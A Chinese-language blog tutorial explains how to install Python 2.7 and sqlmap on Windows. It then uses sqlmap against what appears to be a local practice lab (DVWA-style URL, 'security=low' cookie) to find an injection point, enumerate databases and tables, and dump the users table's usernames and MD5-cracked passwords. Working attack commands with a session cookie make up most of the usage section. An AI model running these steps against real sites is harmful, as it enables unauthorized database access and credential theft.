SQLMAP安装教程与利用SQL注入—Hack之路

SQLMAP安装
SQLMAP安装之前,首先需要安装PYTHON环境,这里安装的2.7版本的python,下载地址:https://www.python.org/ftp/python/2.7.1/python-2.7.1.amd64.msi,安装第一步:下载之后选择第一个选项,然后直接点安装,有取消钩的选项都要点上钩,然后安装
SQLMAP安装教程与利用SQL注入---Hack之路 SQLMAP安装教程与利用SQL注入---Hack之路
直接没有修改的路径会直接安装到C:\Python27,在cmd命令里输入python如果可以查询到python版本即是安装完成的
下面安装SQLMAP,首先下载程序,在SQLMAP官网上下载链接:https://github.com/sqlmapproject/sqlmap/tarball/master,下载成功之后会是一个压缩包,我们帮压缩包解压到python目录,并在桌面创建一个cmd的快捷方式,属性设置为SQLMAP的路径
SQLMAP安装教程与利用SQL注入---Hack之路    SQLMAP安装教程与利用SQL注入---Hack之路   SQLMAP安装教程与利用SQL注入---Hack之路
点击进去之后输入命令,sqlmap.py,如果可运行即安装完成
SQLMAP安装教程与利用SQL注入---Hack之路

SQLMAP的利用
1.判断是否存在注入点
  假设目标注入点是:http://192.168.0.106/vulnerabilities/sqli/?id=1,判断其是否存在注入的命令如下所示
SQLMAP测试注入(需要登录才能注入的需要带正确的cookie)
目标网址:http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#
查询是否可以注入(执行命令):sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low”
SQLMAP安装教程与利用SQL注入---Hack之路
如果出现SQL版本和数据库类型便可以注入
查询有哪些数据库:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” –dbs
SQLMAP安装教程与利用SQL注入---Hack之路
查询当前数据库:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” –current-db
SQLMAP安装教程与利用SQL注入---Hack之路
查询当前数据库的表名:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -D root –tables
SQLMAP安装教程与利用SQL注入---Hack之路
查询重要数据表的所有列名:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -T users –columns
SQLMAP安装教程与利用SQL注入---Hack之路
查询个别重要列名(users,passwrod)的数据:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -T users -C password,user -dump
SQLMAP安装教程与利用SQL注入---Hack之路
查询完毕!一直按回车自动解密MD5

自动化注入还是挺省心的

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/21/sqlmap%e5%ae%89%e8%a3%85%e6%95%99%e7%a8%8b%e4%b8%8e%e5%88%a9%e7%94%a8sql%e6%b3%a8%e5%85%a5-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注